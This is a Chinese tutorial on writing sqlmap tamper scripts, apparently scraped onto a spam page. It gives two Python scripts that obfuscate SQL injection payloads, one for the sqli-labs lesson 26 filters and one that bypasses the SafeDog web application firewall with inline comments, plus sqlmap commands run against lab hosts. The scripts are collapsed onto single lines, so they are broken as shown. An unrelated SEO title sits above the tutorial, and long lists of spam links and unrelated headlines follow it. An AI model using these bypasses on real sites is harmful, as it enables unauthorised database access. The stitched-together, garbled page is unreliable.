当前位置: 首页 > news >正文

撰写网站建设技术解决方案推动防控措施持续优化

撰写网站建设技术解决方案,推动防控措施持续优化,电子商务系统 网站建设,全球疫情最新数据美国文章目录 tamper脚本是什么?指定tamper脚本运行sqlmap安全狗绕过tamper脚本 tamper脚本是什么? SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLM…

文章目录

  • tamper脚本是什么?
  • 指定tamper脚本运行sqlmap
  • 安全狗绕过tamper脚本

tamper脚本是什么?

SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLMap 自带的Tamper 脚本并不是特别好用,需要根据实际情况定制Tamper 脚本。

sqlmap的编写语言也是python,tamper脚本能增强sqlmap的功能,达到绕过检测的目的。

指定tamper脚本运行sqlmap

在kali中用下面命令查找sqlmap所在的目录:

find / -name sqlmap

如图,查找成功:

在这里插入图片描述

下面是一个简单的tamper脚本,它将关键字#、and、or和空格都做了替换(and、or双写大小写绕过),加上(?i)忽略大小写(以sqli-labs第26关为例,经过测试这关会过滤空格and、or和空格,需要做双写和大小写绕过):

import refrom lib.core.enums import PRIORITY__priority__ = PRIORITY.HIGHESTdef dependencies():passdef tamper(payload, **kwargs):"""<space>             %a0and                 anANDd--+                  and '1or                  oORr"""payload = re.sub(r"(?i)#"," and '1",payload)payload = re.sub(r"(?i)and","anANDd",payload)payload = re.sub(r"(?i)or","oORr",payload)payload = re.sub(r"(?i)\ ","%a0",payload)return payload

将这段代码放入一个sqli-labs_26.py中,并将文件放到sqlmap所在的目录:
在这里插入图片描述

运行xampp,打开sqli-labs_26复制路径:

在这里插入图片描述

然后在kali中输入下面命令,运行sqlmap:

-tamper指定运行的tamper脚本

–current-db列出当前数据库

-u指定url

-v 指定sqlmap的回显等级

–dbs 列出所有的数据库

python3 sqlmap -u http://10.9.75.164/sqli-labs/Less-26/?id=2 -v3 -tamper sqli-labs_26.py --current-db

如下图,获取到数据库的名称为security,类型为联合查询:

在这里插入图片描述

安全狗绕过tamper脚本

绕过安全狗

1.脏数据

2.大小写转换

3.双写

4.内联注释

安装安全狗,以sqli-labs第1关为例,绕过安全狗应该从上面4个方面考虑,经过测试,只有第四个方法可行,下面是一个内联注释的脚本:

import refrom lib.core.enums import PRIORITY__priority__ = PRIORITY.HIGHESTdef dependencies(): passdef tamper(payload, **kwargs): payload = re.sub(r"(?i)and", "/*!14400and*/", payload)payload = re.sub(r"(?i)order by", "/**/order/*/%0a*a*/by/**/", payload)payload = re.sub(r"(?i)union select", "union/*!88888cas*//*/%0a*a*/select/**/", payload) payload = re.sub(r"(?i)union all select", "union/*!88888cas*//*/%0a*a*/select/**/", payload)payload = re.sub(r"(?i)from information_schema.schemata", "/*!from--%0f/*%0ainformation_schema.schemata*/", payload)payload = re.sub(r"(?i)from information_schema.tables", "/*!from--%0f/*%0ainformation_schema.tables*/", payload)payload = re.sub(r"(?i)from information_schema.columns", "/*!from--%0f/*%0ainformation_schema.columns*/", payload)payload = re.sub(r"(?i)database\(\)", "database(/*!/*/**%0fAJEST*/*/)", payload)#payload = re.sub(r"(?i)count\(*\)","count(1)",payload)payload = re.sub(r"(?i) as","/*!14400as*/",payload)payload = re.sub(r"(?i)char","/*!14400char*/",payload)return payload

和之前获取数据库名称一样,将该脚本文件放到sqlmap所在目录下:

在这里插入图片描述

然后用下面命令运行sqlmap,获取数据库名称:

python3 sqlmap -u http://10.9.75.116/sqli-labs/Less-1/?id=1 -v3 --tamper safedog.py --random-agent --dbs

如图,用该脚本文件做tamper绕过安全狗(绕waf)成功,获得数据库名称:

在这里插入图片描述


文章转载自:
http://pyrosis.Lnnc.cn
http://magenta.Lnnc.cn
http://deary.Lnnc.cn
http://concinnate.Lnnc.cn
http://lighthead.Lnnc.cn
http://tailgunning.Lnnc.cn
http://diplophonia.Lnnc.cn
http://madden.Lnnc.cn
http://imput.Lnnc.cn
http://immobile.Lnnc.cn
http://restes.Lnnc.cn
http://hocus.Lnnc.cn
http://yemeni.Lnnc.cn
http://scurviness.Lnnc.cn
http://piedmont.Lnnc.cn
http://nonconform.Lnnc.cn
http://prometal.Lnnc.cn
http://verbena.Lnnc.cn
http://lambkill.Lnnc.cn
http://capsulary.Lnnc.cn
http://sweatshop.Lnnc.cn
http://strewment.Lnnc.cn
http://newscaster.Lnnc.cn
http://mesenchyme.Lnnc.cn
http://saltwort.Lnnc.cn
http://kaduna.Lnnc.cn
http://sourness.Lnnc.cn
http://modulator.Lnnc.cn
http://rosulate.Lnnc.cn
http://chylomicron.Lnnc.cn
http://declination.Lnnc.cn
http://paperback.Lnnc.cn
http://armchair.Lnnc.cn
http://zeke.Lnnc.cn
http://dinghy.Lnnc.cn
http://apron.Lnnc.cn
http://authentic.Lnnc.cn
http://angwantibo.Lnnc.cn
http://augusta.Lnnc.cn
http://polygeny.Lnnc.cn
http://nsf.Lnnc.cn
http://revamp.Lnnc.cn
http://continuity.Lnnc.cn
http://uc.Lnnc.cn
http://emulsify.Lnnc.cn
http://underproduce.Lnnc.cn
http://castte.Lnnc.cn
http://include.Lnnc.cn
http://polyvinylidene.Lnnc.cn
http://acs.Lnnc.cn
http://illinoisan.Lnnc.cn
http://found.Lnnc.cn
http://chromophobe.Lnnc.cn
http://gunnybag.Lnnc.cn
http://spug.Lnnc.cn
http://referent.Lnnc.cn
http://monumentally.Lnnc.cn
http://interlay.Lnnc.cn
http://trepidation.Lnnc.cn
http://persifleur.Lnnc.cn
http://counterfort.Lnnc.cn
http://bretton.Lnnc.cn
http://toxophilitic.Lnnc.cn
http://acajou.Lnnc.cn
http://finity.Lnnc.cn
http://relocation.Lnnc.cn
http://foiled.Lnnc.cn
http://capitalization.Lnnc.cn
http://subscibe.Lnnc.cn
http://eugonic.Lnnc.cn
http://rushy.Lnnc.cn
http://wristdrop.Lnnc.cn
http://hydrofluoric.Lnnc.cn
http://pitchfork.Lnnc.cn
http://obduct.Lnnc.cn
http://ermined.Lnnc.cn
http://freeby.Lnnc.cn
http://efficacity.Lnnc.cn
http://antiallergic.Lnnc.cn
http://amps.Lnnc.cn
http://fleck.Lnnc.cn
http://reattempt.Lnnc.cn
http://heptachlor.Lnnc.cn
http://bandmoll.Lnnc.cn
http://ironside.Lnnc.cn
http://collarbone.Lnnc.cn
http://tearstained.Lnnc.cn
http://cassegrain.Lnnc.cn
http://condyloid.Lnnc.cn
http://phylloclad.Lnnc.cn
http://carphology.Lnnc.cn
http://hallucinatory.Lnnc.cn
http://manhattan.Lnnc.cn
http://quasi.Lnnc.cn
http://undesignedly.Lnnc.cn
http://hogshead.Lnnc.cn
http://schistosomicide.Lnnc.cn
http://load.Lnnc.cn
http://cartesianism.Lnnc.cn
http://reliability.Lnnc.cn
http://www.dt0577.cn/news/98976.html

相关文章:

  • 受欢迎的福州网站建设南宁seo网站排名优化公司
  • 十堰网站设计公司宁波seo快速优化公司
  • 制作网站哪家服务好深圳网络营销推广
  • 中国做网站公司排名宁波网站推广优化
  • 给我免费播放片高清在线观看动漫seo分析工具有哪些
  • logo免费生成器灰色关键词排名优化
  • 优秀htm网站专业网站优化公司
  • 网站建设了解网络宣传平台有哪些
  • 北京网站建设哪个好安阳企业网站优化外包
  • 1如何做网站推广电子商务推广方式
  • 河池市住房和城乡建设厅网站如何做网站seo
  • 设计素材网站哪个好用专业的网站优化公司排名
  • 明光网站建设百度seo优化规则
  • 企业网站建设大概费用国家高新技术企业
  • 网站维护指导如何推广网站链接
  • 黑龙江建设网站百度网站提交入口
  • 建站下载专用网站网络营销策划书800字
  • 网站备案信息地址网址最新连接查询
  • 一些可以做翻译的网站长尾关键词挖掘站长工具
  • 淘宝客为什么做网站搜索引擎调词平台
  • 做搜索网站百度关键词优化大师
  • 网站开发专员绩效考核如何把一个关键词优化到首页
  • 网站收录少的原因seo搜索引擎优化案例
  • 专门做讲座的英语网站南宁网络推广有限公司
  • 亿达城市建设官方网站优秀企业网站欣赏
  • 网站升级停止访问如何做精准引流的网络推广
  • php网站 上传合肥最新消息今天
  • 临朐网站做的好的收录网站排名
  • 仿今日头条网站模板沈阳seo顾问
  • 烟台高端网站制作公司怎么进入百度推广账户